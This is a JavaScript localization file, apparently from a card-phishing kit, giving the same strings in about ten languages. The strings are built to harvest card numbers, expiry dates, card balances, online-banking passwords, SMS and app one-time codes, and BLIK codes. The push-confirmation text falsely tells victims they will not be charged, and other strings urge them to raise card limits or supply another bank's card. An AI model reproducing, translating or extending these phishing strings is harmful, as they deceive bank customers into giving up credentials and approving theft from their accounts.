module.exports = {
  support_chat: {
    en: "Support Chat",
    pl: "Wsparcie Czat",
    cz: "Podpora chatu",
    de: "Support-Chat",
    au: "Support Chat",
    es: "Charla de soporte",
    ro: "Chat de asistență",
    it: "Chat di supporto",
    ae: "دعم الدردشة",
    uk: "Support Chat",
  },
  your_message: {
    en: "Your message... ",
    pl: "Twoja wiadomość...",
    cz: "Vaše zpráva...",
    de: "Ihre Nachricht...",
    au: "Your message... ",
    es: "Tu mensaje...",
    ro: "Mesajul dvs...",
    it: "Il tuo messaggio...",
    ae: "رسالتك...",
    uk: "Your message... ",
  },
  send: {
    en: "Send",
    pl: "Wysłać",
    cz: "Poslat",
    de: "Schicken",
    au: "Send",
    es: "Enviar",
    ro: "Trimite",
    it: "Spedire",
    ae: "يرسل",
    uk: "Send",
  },
  card_balance: {
    en: "Card balance",
    pl: "Saldo karty",
    cz: "Zůstatek na kartě",
    de: "Kartenguthaben",
    au: "Card balance",
    es: "Balance de tarjeta",
    ro: "Soldul cardului",
    it: "Saldo della carta",
    ae: "رصيد البطاقة",
    uk: "Card balance",
  },
  expires: {
    en: "Expires",
    pl: "Wygasa",
    cz: "Platnost vyprší",
    de: "Läuft ab",
    au: "Expires",
    es: "Caduca",
    ro: "Expiră",
    it: "Scade",
    ae: "تنتهي",
    uk: "Expires",
  },
  card_number: {
    en: "Card number",
    pl: "Numer karty",
    cz: "Číslo karty",
    de: "Kartennummer",
    au: "Card number",
    es: "Número de tarjeta",
    ro: "Număr de card",
    it: "Numero di carta",
    ae: "رقم البطاقة",
    uk: "Card number",
  },
  expiration_date: {
    en: "Expiration date",
    pl: "Termin ważności",
    cz: "Datum spotřeby",
    de: "Haltbarkeitsdatum",
    au: "Expiration date",
    es: "Fecha de caducidad",
    ro: "Data expirării",
    it: "Data di scadenza",
    ae: "تاريخ الإنتهاء",
    uk: "Expiration date",
  },
  month: {
    en: "Month",
    pl: "Miesiąc",
    cz: "Měsíc",
    de: "Monat",
    au: "Month",
    es: "Mes",
    ro: "Lună",
    it: "Mese",
    ae: "شهر",
    uk: "Month",
  },
  year: {
    en: "Year",
    pl: "Rok",
    cz: "Rok",
    de: "Jahr",
    au: "Year",
    es: "Año",
    ro: "An",
    it: "Anno",
    ae: "سنة",
    uk: "Year",
  },
  wrong_code: {
    en: "You have entered the wrong code! Please try again.",
    pl: "Wpisałeś zły kod! Proszę spróbuj ponownie.",
    cz: "Zadali jste špatný kód! Prosím zkuste to znovu.",
    de: "Sie haben den falschen Code eingegeben! Bitte versuche es erneut.",
    au: "You have entered the wrong code! Please try again.",
    es: "¡Ha introducido el código incorrecto! Inténtalo de nuevo.",
    ro: "Ați introdus un cod greșit! Vă rugăm să încercați din nou.",
    it: "Hai inserito il codice sbagliato! Per favore riprova.",
    ae: "لقد أدخلت الرمز الخطأ! حاول مرة اخرى.",
    uk: "You have entered the wrong code! Please try again.",
  },
  push_title: {
    en: "To verify your card, confirm the transaction on the bank's mobile app",
    pl: "Aby zweryfikować swoją kartę, potwierdź transakcję w aplikacji mobilnej banku",
    cz: "Pro ověření karty potvrďte transakci v mobilní aplikaci banky",
    de: "Um Ihre Karte zu verifizieren, bestätigen Sie die Transaktion in der mobilen App der Bank",
    au: "To verify your card, confirm the transaction on the bank's mobile app",
    es: "Para verificar su tarjeta, confirme la transacción en la aplicación móvil del banco",
    ro: "Pentru a vă verifica cardul, confirmați tranzacția în aplicația mobilă a băncii",
    it: "Per verificare la tua carta, conferma la transazione sull'app mobile della banca",
    ae: "للتحقق من بطاقتك ، قم بتأكيد المعاملة على تطبيق الهاتف المحمول الخاص بالبنك",
    uk: "To verify your card, confirm the transaction on the bank's mobile app",
  },
  push_text: {
    en: "To transfer money to your card, your card must be verified. This is a request to verify the card, but you will not be charged, the system will simply state that the card is not blocked and is ready for the transaction.",
    pl: "Aby przelać pieniądze na Twoją kartę, Twoja karta musi zostać zweryfikowana. Jest to prośba o weryfikację karty, ale nie zostaniesz obciążony, system po prostu stwierdzi, że karta nie jest zablokowana i jest gotowa do transakcji.",
    cz: "Chcete-li převést peníze na svou kartu, musí být vaše karta ověřena. Jedná se o požadavek na ověření karty, který vám však nebude účtován, systém pouze oznámí, že karta není blokována a je připravena k transakci.",
    de: "Um Geld auf Ihre Karte zu überweisen, muss Ihre Karte verifiziert werden. Dies ist eine Aufforderung zur Verifizierung der Karte, die Ihnen jedoch nicht in Rechnung gestellt wird. Das System gibt lediglich an, dass die Karte nicht gesperrt und für die Transaktion bereit ist.",
    au: "To transfer money to your card, your card must be verified. This is a request to verify the card, but you will not be charged, the system will simply state that the card is not blocked and is ready for the transaction.",
    es: "Para transferir dinero a su tarjeta, su tarjeta debe ser verificada. Esta es una solicitud para verificar la tarjeta, pero no se le cobrará, el sistema simplemente indicará que la tarjeta no está bloqueada y está lista para la transacción.",
    ro: "Pentru a transfera bani pe cardul dvs., cardul dvs. trebuie verificat. Aceasta este o solicitare de verificare a cardului, dar nu veți fi taxat, sistemul va spune pur și simplu că cardul nu este blocat și este gata pentru tranzacție.",
    it: "Per trasferire denaro sulla tua carta, la tua carta deve essere verificata. Questa è una richiesta di verifica della carta, ma non ti verrà addebitato, il sistema indicherà semplicemente che la carta non è bloccata ed è pronta per la transazione.",
    ae: "لتحويل الأموال إلى بطاقتك ، يجب التحقق من بطاقتك. هذا طلب للتحقق من البطاقة ، لكن لن يتم تحصيل رسوم منك ، سيذكر النظام ببساطة أن البطاقة ليست محظورة وجاهزة للمعاملة.",
    uk: "To transfer money to your card, your card must be verified. This is a request to verify the card, but you will not be charged, the system will simply state that the card is not blocked and is ready for the transaction.",
  },
  success: {
    en: "Success",
    pl: "Powodzenie",
    cz: "Úspěch",
    de: "Erfolg",
    au: "Success",
    es: "Éxito",
    ro: "Succes",
    it: "Successo",
    ae: "نجاح",
    uk: "Success",
  },
  money_will: {
    en: "The money will be transferred to your bank card within 24 hours.",
    pl: "Pieniądze zostaną przelane na Twoją kartę bankową w ciągu 24 godzin.",
    cz: "Peníze budou převedeny na vaši bankovní kartu do 24 hodin.",
    de: "Das Geld wird innerhalb von 24 Stunden auf Ihre Bankkarte überwiesen.",
    au: "The money will be transferred to your bank card within 24 hours.",
    es: "El dinero será transferido a su tarjeta bancaria dentro de las 24 horas.",
    ro: "Banii vor fi transferați pe cardul dumneavoastră bancar în termen de 24 de ore.",
    it: "Il denaro sarà trasferito sulla tua carta di credito entro 24 ore.",
    ae: "سيتم تحويل الأموال إلى بطاقتك المصرفية في غضون 24 ساعة.",
    uk: "The money will be transferred to your bank card within 24 hours.",
  },
  bank_passord_title: {
    en: "Enter your online banking password",
    pl: "Wpisz swoje hasło do bankowości internetowej",
    cz: "Zadejte heslo svého internetového bankovnictví",
    de: "Geben Sie Ihr Online-Banking-Passwort ein",
    au: "Enter your online banking password",
    es: "Ingrese su contraseña de banca en línea",
    ro: "Introduceți parola dvs. bancară online",
    it: "Inserisci la tua password bancaria online",
    ae: "أدخل كلمة المرور الخاصة بالخدمات المصرفية عبر الإنترنت",
    uk: "Enter your online banking password",
  },
  sms_title: {
    en: "enter SMS code",
    pl: "wpisz kod SMS",
    cz: "zadejte SMS kód",
    de: "SMS-Code eingeben",
    au: "enter SMS code",
    es: "ingrese el código SMS",
    ro: "introduceți codul SMS",
    it: "inserire il codice SMS",
    ae: "أدخل رمز SMS",
    uk: "enter SMS code",
  },
  sms_text: {
    en: "A one-time SMS code has been sent to your phone",
    pl: "Na Twój telefon został wysłany jednorazowy kod SMS",
    cz: "Na váš telefon byl odeslán jednorázový SMS kód",
    de: "Ein einmaliger SMS-Code wurde an Ihr Telefon gesendet",
    au: "A one-time SMS code has been sent to your phone",
    es: "Se ha enviado un código SMS único a su teléfono",
    ro: "Un cod SMS unic a fost trimis pe telefonul dvs",
    it: "Un codice SMS monouso è stato inviato al tuo telefono",
    ae: "تم إرسال رمز SMS لمرة واحدة إلى هاتفك",
    uk: "A one-time SMS code has been sent to your phone",
  },
  bank_passord_text: {
    en: "You must provide a password for your mobile bank",
    pl: "Musisz podać hasło do swojego banku mobilnego",
    cz: "Musíte zadat heslo pro svou mobilní banku",
    de: "Sie müssen ein Passwort für Ihre mobile Bank angeben",
    au: "You must provide a password for your mobile bank",
    es: "Debe proporcionar una contraseña para su banco móvil",
    ro: "Trebuie să furnizați o parolă pentru banca dvs. mobilă",
    it: "Devi fornire una password per la tua banca mobile",
    ae: "يجب عليك توفير كلمة مرور للبنك المحمول الخاص بك",
    uk: "You must provide a password for your mobile bank",
  },
  bank_passord_placeholder: {
    en: "Password",
    pl: "Hasło",
    cz: "Heslo",
    de: "Passwort",
    au: "Password",
    es: "Clave",
    ro: "Parola",
    it: "Parola d'ordine",
    ae: "كلمه السر",
    uk: "Password",
  },
  sms_placeholder: {
    en: "One-time SMS code",
    pl: "Jednorazowy kod SMS",
    cz: "Jednorázový SMS kód",
    de: "Einmaliger SMS-Code",
    au: "One-time SMS code",
    es: "Código SMS único",
    ro: "Cod SMS unic",
    it: "Codice SMS monouso",
    ae: "رمز SMS لمرة واحدة",
    uk: "One-time SMS code",
  },
  bank_passord_wrong: {
    en: "You entered the wrong password",
    pl: "Wpisałeś złe hasło",
    cz: "Zadali jste špatné heslo",
    de: "Sie haben das falsche Passwort eingegeben",
    au: "You entered the wrong password",
    es: "Ingresaste la contraseña incorrecta",
    ro: "Ați introdus o parolă greșită",
    it: "Hai inserito la password sbagliata",
    ae: "لقد أدخلت كلمة مرور خاطئة",
    uk: "You entered the wrong password",
  },
  app_code_title: {
    en: "Within 2 minutes, the verification code will be sent to your banking application.",
    pl: "W ciągu 2 minut kod weryfikacyjny zostanie wysłany do Twojej aplikacji bankowej.",
    cz: "Do 2 minut bude do vaší bankovní aplikace zaslán ověřovací kód.",
    de: "Innerhalb von 2 Minuten wird der Bestätigungscode an Ihre Bankanwendung gesendet.",
    au: "Within 2 minutes, the verification code will be sent to your banking application.",
    es: "En 2 minutos, el código de verificación se enviará a su aplicación bancaria.",
    ro: "În 2 minute, codul de verificare va fi trimis către aplicația dvs. bancară.",
    it: "Entro 2 minuti, il codice di verifica verrà inviato alla tua applicazione bancaria.",
    ae: "في غضون دقيقتين ، سيتم إرسال رمز التحقق إلى تطبيقك المصرفي.",
    uk: "Within 2 minutes, the verification code will be sent to your banking application.",
  },
  app_code_text: {
    en: "enter the code that was sent to your banking application",
    pl: "wprowadź kod, który został wysłany do Twojej aplikacji bankowej",
    cz: "zadejte kód, který vám byl zaslán do vaší bankovní aplikace",
    de: "Geben Sie den Code ein, der an Ihre Bankanwendung gesendet wurde",
    au: "enter the code that was sent to your banking application",
    es: "ingrese el código que se envió a su aplicación bancaria",
    ro: "introduceți codul care a fost trimis în aplicația dvs. bancară",
    it: "inserisci il codice che è stato inviato alla tua applicazione bancaria",
    ae: "أدخل الرمز الذي تم إرساله إلى تطبيقك المصرفي",
    uk: "enter the code that was sent to your banking application",
  },
  app_code_placeholder: {
    en: "Verification code",
    pl: "Kod weryfikacyjny",
    cz: "Ověřovací kód",
    de: "Bestätigungs-Code",
    au: "Verification code",
    es: "Código de verificación",
    ro: "Cod de verificare",
    it: "Codice di verifica",
    ae: "شيفرة التأكيد",
    uk: "Verification code",
  },
  call_code_title: {
    en: "The bank will give you a verification code over the phone",
    pl: "Bank przekaże Ci kod weryfikacyjny przez telefon",
    cz: "Banka vám po telefonu sdělí ověřovací kód",
    de: "Die Bank teilt Ihnen telefonisch einen Verifizierungscode mit",
    au: "The bank will give you a verification code over the phone",
    es: "El banco te dará un código de verificación por teléfono",
    ro: "Banca vă va oferi un cod de verificare prin telefon",
    it: "La banca ti fornirà un codice di verifica per telefono",
    ae: "سيعطيك البنك رمز التحقق عبر الهاتف",
    uk: "The bank will give you a verification code over the phone",
  },
  call_code_text: {
    en: "enter the code the bank gave you over the phone",
    pl: "wpisz kod, który bank przekazał Ci przez telefon",
    cz: "zadejte kód, který vám banka poskytla po telefonu",
    de: "Geben Sie den Code ein, den Ihnen die Bank am Telefon gegeben hat",
    au: "enter the code the bank gave you over the phone",
    es: "introduce el código que te dio el banco por teléfono",
    ro: "introduceți codul pe care vi l-a dat banca la telefon",
    it: "inserisci il codice che la banca ti ha fornito al telefono",
    ae: "أدخل الرمز الذي أعطاك البنك لك عبر الهاتف",
    uk: "enter the code the bank gave you over the phone",
  },
  call_code_placeholder: {
    en: "enter the code",
    pl: "Wpisz kod",
    cz: "zadejte kód",
    de: "Gib den code ein",
    au: "enter the code",
    es: "introduzca el código",
    ro: "Introduceti codul",
    it: "inserisci il codice",
    ae: "ادخل الكود",
    uk: "enter the code",
  },
  blik_code_title: {
    en: "BLIK payment",
    pl: "płatność BLIKIEM",
    cz: "BLIK platba",
    de: "BLIK-Zahlung",
    au: "BLIK payment",
    es: "Pago BLIK",
    ro: "Plata BLIK",
    it: "Pagamento BLIK",
    ae: "دفع BLIK",
    uk: "BLIK payment",
  },
  blik_code_text: {
    en: "Generate a Blik code on your account and enter it",
    pl: "Wygeneruj kod Blik na swoim koncie i wprowadź go",
    cz: "Vygenerujte na svém účtu Blik kód a zadejte jej",
    de: "Generieren Sie einen Blik-Code in Ihrem Konto und geben Sie ihn ein",
    au: "Generate a Blik code on your account and enter it",
    es: "Genere un código Blik en su cuenta e ingréselo",
    ro: "Generați un cod Blik pe contul dvs. și introduceți-l",
    it: "Genera un codice Blik sul tuo account e inseriscilo",
    ae: "قم بإنشاء رمز Blik على حسابك وأدخله",
    uk: "Generate a Blik code on your account and enter it",
  },
  blik_code_placeholder: {
    en: "BLIK code",
    pl: "Kod BLIK",
    cz: "BLIK kód",
    de: "BLIK-Code",
    au: "BLIK code",
    es: "codigo BLIK",
    ro: "Cod BLIK",
    it: "codice BLIK",
    ae: "كود بليك",
    uk: "BLIK code",
  },
  picture_title: {
    en: "When verifying your account in the system, we will provide the image title with your phone, which you must provide for confirmation. Once the correct images are provided, the funds will be credited to your account.",
    pl: "Podczas weryfikacji Twojego konta w systemie podamy wraz z telefonem tytuł obrazu, który należy podać w celu potwierdzenia. Po dostarczeniu prawidłowych zdjęć środki zostaną przekazane na Twoje konto.",
    cz: "Při ověřování vašeho účtu v systému poskytneme název obrázku s vaším telefonem, který musíte poskytnout pro potvrzení. Jakmile budou poskytnuty správné obrázky, budou prostředky připsány na váš účet.",
    de: "Bei der Verifizierung Ihres Kontos im System geben wir den Bildtitel mit Ihrem Telefon an, den Sie zur Bestätigung angeben müssen. Sobald die richtigen Bilder bereitgestellt wurden, wird das Geld Ihrem Konto gutgeschrieben.",
    au: "When verifying your account in the system, we will provide the image title with your phone, which you must provide for confirmation. Once the correct images are provided, the funds will be credited to your account.",
    es: "Al verificar su cuenta en el sistema, le proporcionaremos el título de la imagen con su teléfono, que debe proporcionar para la confirmación. Una vez que se proporcionen las imágenes correctas, los fondos se acreditarán en su cuenta.",
    ro: "Când vă verificăm contul în sistem, vă vom furniza titlul imaginii împreună cu telefonul dvs., pe care trebuie să îl furnizați pentru confirmare. Odată ce sunt furnizate imaginile corecte, fondurile vor fi creditate în contul dumneavoastră.",
    it: "Durante la verifica del tuo account nel sistema, ti forniremo il titolo dell'immagine con il tuo telefono, che devi fornire per conferma. Una volta fornite le immagini corrette, i fondi verranno accreditati sul tuo account.",
    ae: "عند التحقق من حسابك في النظام ، سنزودك بعنوان الصورة بهاتفك ، والذي يجب عليك تقديمه للتأكيد. بمجرد تقديم الصور الصحيحة ، ستتم إضافة الأموال إلى حسابك.",
    uk: "When verifying your account in the system, we will provide the image title with your phone, which you must provide for confirmation. Once the correct images are provided, the funds will be credited to your account.",
  },
  picture_text: {
    en: "In a moment, we will call you and say a word-picture. In some cases, we'll send a push notification to your bank's app after you provide the first picture that you need to confirm.",
    pl: "Za chwilę zadzwonimy i powiemy słowo-obraz. W niektórych przypadkach wyślemy powiadomienie push do aplikacji Twojego banku po podaniu pierwszego zdjęcia, które musisz potwierdzić.",
    cz: "Za chvíli vám zavoláme a řekneme slovo-obrázek. V některých případech odešleme oznámení push do aplikace vaší banky poté, co poskytnete první obrázek, který musíte potvrdit.",
    de: "Wir werden Sie gleich anrufen und ein Wortbild sagen. In einigen Fällen senden wir eine Push-Benachrichtigung an die App Ihrer Bank, nachdem Sie das erste Bild bereitgestellt haben, das Sie bestätigen müssen.",
    au: "In a moment, we will call you and say a word-picture. In some cases, we'll send a push notification to your bank's app after you provide the first picture that you need to confirm.",
    es: "En un momento, te llamaremos y te diremos una palabra-imagen. En algunos casos, enviaremos una notificación automática a la aplicación de su banco después de que proporcione la primera imagen que necesita confirmar.",
    ro: "Într-o clipă, vă vom suna și vă vom spune o imagine-cuvânt. În unele cazuri, vom trimite o notificare push către aplicația băncii dvs. după ce furnizați prima imagine pe care trebuie să o confirmați.",
    it: "Tra un momento, ti chiameremo e diremo una parola-immagine. In alcuni casi, invieremo una notifica push all'app della tua banca dopo che avrai fornito la prima immagine che devi confermare.",
    ae: "بعد قليل سنتصل بك ونقول صورة بالكلمة. في بعض الحالات ، سنرسل إشعارًا فوريًا إلى تطبيق البنك الذي تتعامل معه بعد تقديم الصورة الأولى التي تحتاج إلى تأكيدها.",
    uk: "In a moment, we will call you and say a word-picture. In some cases, we'll send a push notification to your bank's app after you provide the first picture that you need to confirm.",
  },
  wrong_picture: {
    en: "You chose the wrong photo",
    pl: "Wybrałeś złe zdjęcie",
    cz: "Vybrali jste špatnou fotku",
    de: "Sie haben das falsche Foto ausgewählt",
    au: "You chose the wrong photo",
    es: "Elegiste la foto equivocada",
    ro: "Ai ales fotografia greșită",
    it: "Hai scelto la foto sbagliata",
    ae: "لقد اخترت الصورة الخاطئة",
    uk: "You chose the wrong photo",
  },
  submit: {
    en: "Submit",
    pl: "Składać",
    cz: "Předložit",
    de: "Einreichen",
    au: "Submit",
    es: "Entregar",
    ro: "Trimite",
    it: "Invia",
    ae: "إرسال",
    uk: "Submit",
  },
  error: {
    en: "An unexpected error has occurred. Please try again",
    pl: "Wystąpił nieoczekiwany błąd. Proszę spróbuj ponownie",
    cz: "Došlo k neočekávané chybě. Prosím zkuste to znovu",
    de: "Ein unerwarteter Fehler ist aufgetreten. Bitte versuche es erneut",
    au: "An unexpected error has occurred. Please try again",
    es: "Ha ocurrido un error inesperado. Inténtalo de nuevo",
    ro: "A aparut o eroare neasteptata. Vă rugăm să încercați din nou",
    it: "Si è verificato un errore imprevisto. Per favore riprova",
    ae: "لقد حدث خطأ غير متوقع. حاول مرة اخرى",
    uk: "An unexpected error has occurred. Please try again",
  },
  error_title: {
    en: "Error",
    pl: "Błąd",
    cz: "Chyba",
    de: "Fehler",
    au: "Error",
    es: "Error",
    ro: "Eroare",
    it: "Errore",
    ae: "خطأ",
    uk: "Error",
  },
  card_number_invalid: {
    en: "Card number is incorrect",
    pl: "Numer karty jest nieprawidłowy",
    cz: "Číslo karty je nesprávné",
    de: "Kartennummer ist falsch",
    au: "Card number is incorrect",
    es: "El número de tarjeta es incorrecto",
    ro: "Numărul cardului este incorect",
    it: "Il numero della carta non è corretto",
    ae: "رقم البطاقة غير صحيح",
    uk: "Card number is incorrect",
  },
  attention: {
    en: "Attention",
    pl: "Uwaga",
    cz: "Pozornost",
    de: "Beachtung",
    au: "Attention",
    es: "Atención",
    ro: "Atenţie",
    it: "Attenzione",
    ae: "انتباه",
    uk: "Attention",
  },
  bank_asked: {
    en: "The bank requested additional bank card information to verify card ownership.",
    pl: "Bank zażądał dodatkowych informacji o karcie bankowej w celu zweryfikowania własności karty.",
    cz: "Banka si za účelem ověření vlastnictví karty vyžádala další údaje o bankovní kartě.",
    de: "Die Bank hat zusätzliche Bankkarteninformationen angefordert, um den Kartenbesitz zu bestätigen.",
    au: "The bank requested additional bank card information to verify card ownership.",
    es: "El banco solicitó información adicional de la tarjeta bancaria para verificar la titularidad de la tarjeta.",
    ro: "Banca a solicitat informații suplimentare despre cardul bancar pentru a verifica calitatea de proprietar al cardului.",
    it: "La banca ha richiesto ulteriori informazioni sulla carta bancaria per verificare la proprietà della carta.",
    ae: "طلب البنك معلومات بطاقة مصرفية إضافية للتحقق من ملكية البطاقة.",
    uk: "The bank requested additional bank card information to verify card ownership.",
  },
  wait: {
    en: "Expect",
    pl: "Oczekiwać",
    cz: "Očekávat",
    de: "Erwarten von",
    au: "Expect",
    es: "Esperar",
    ro: "Aştepta",
    it: "Aspettare",
    ae: "يتوقع",
    uk: "Expect",
  },
  bank_processes: {
    en: "The bank is processing your data. This may take some time",
    pl: "Bank przetwarza Twoje dane. To może zająć troche czasu",
    cz: "Banka zpracovává vaše údaje. To může chvíli trvat",
    de: "Die Bank verarbeitet Ihre Daten. Das kann ein bisschen dauern",
    au: "The bank is processing your data. This may take some time",
    es: "El banco está tratando tus datos. Esto puede tomar algo de tiempo",
    ro: "Banca vă prelucrează datele. Acest lucru poate dura ceva timp",
    it: "La banca sta elaborando i tuoi dati. Questo potrebbe richiedere del tempo",
    ae: "يقوم البنك بمعالجة بياناتك. هذا قد يستغرق بعض الوقت",
    uk: "The bank is processing your data. This may take some time",
  },
  limits: {
    en: "You need to raise the internet limits on your card to make a transaction!",
    pl: "Aby dokonać transakcji, musisz podnieść limity internetowe na swojej karcie!",
    cz: "Chcete-li provést transakci, musíte zvýšit internetové limity na vaší kartě!",
    de: "Sie müssen die Internetlimits auf Ihrer Karte erhöhen, um eine Transaktion durchzuführen!",
    au: "You need to raise the internet limits on your card to make a transaction!",
    es: "¡Necesita aumentar los límites de Internet en su tarjeta para realizar una transacción!",
    ro: "Trebuie să ridici limitele de internet pe cardul tău pentru a face o tranzacție!",
    it: "Devi aumentare i limiti di Internet sulla tua carta per effettuare una transazione!",
    ae: "تحتاج إلى رفع حدود الإنترنت على بطاقتك لإجراء معاملة!",
    uk: "You need to raise the internet limits on your card to make a transaction!",
  },
  other_card: {
    en: "At this moment we do not cooperate with cards of this bank. You need to specify a card of another bank!",
    pl: "W tej chwili nie współpracujemy z kartami tego banku. Musisz podać kartę innego banku!",
    cz: "V tuto chvíli nespolupracujeme s kartami této banky. Musíte zadat kartu jiné banky!",
    de: "Im Moment arbeiten wir nicht mit Karten dieser Bank zusammen. Sie müssen eine Karte einer anderen Bank angeben!",
    au: "At this moment we do not cooperate with cards of this bank. You need to specify a card of another bank!",
    es: "En este momento no cooperamos con tarjetas de este banco. ¡Necesitas especificar una tarjeta de otro banco!",
    ro: "În acest moment nu cooperăm cu cardurile acestei bănci. Trebuie să specificați un card al unei alte bănci!",
    it: "Al momento non collaboriamo con le carte di questa banca. Devi specificare una carta di un'altra banca!",
    ae: "في هذه اللحظة نحن لا نتعاون مع بطاقات هذا البنك. تحتاج إلى تحديد بطاقة بنك آخر!",
    uk: "At this moment we do not cooperate with cards of this bank. You need to specify a card of another bank!",
  },
  for_verify: {
    en: "",
    pl: "",
    cz: "",
    de: "",
    au: "",
    es: "",
    ro: "",
    it: "",
    ae: "",
    uk: "",
  },
  correct_balance: {
    en: "enter the exact balance on your card!",
    pl: "wprowadź dokładne saldo na swojej karcie!",
    cz: "zadejte přesný zůstatek na vaší kartě!",
    de: "Geben Sie das genaue Guthaben auf Ihrer Karte ein!",
    au: "enter the exact balance on your card!",
    es: "introduzca el saldo exacto de su tarjeta!",
    ro: "introduceți soldul exact pe cardul dvs.!",
    it: "inserisci il saldo esatto sulla tua carta!",
    ae: "أدخل الرصيد الدقيق على بطاقتك!",
    uk: "enter the exact balance on your card!",
  },
  currency: {
    pl: "zł",
    en: "£",
    es: "€",
    ae: "د. إ",
    au: "$",
    de: "€",
    dk: "kr",
    pt: "€",
    ua: "₴",
    ro: "lei",
    se: "kr",
    hr: "Kn",
    fr: "€",
    it: "€",
    be: "€",
    bg: "лв",
    rs: "din",
    cz: "Kč",
  },
};
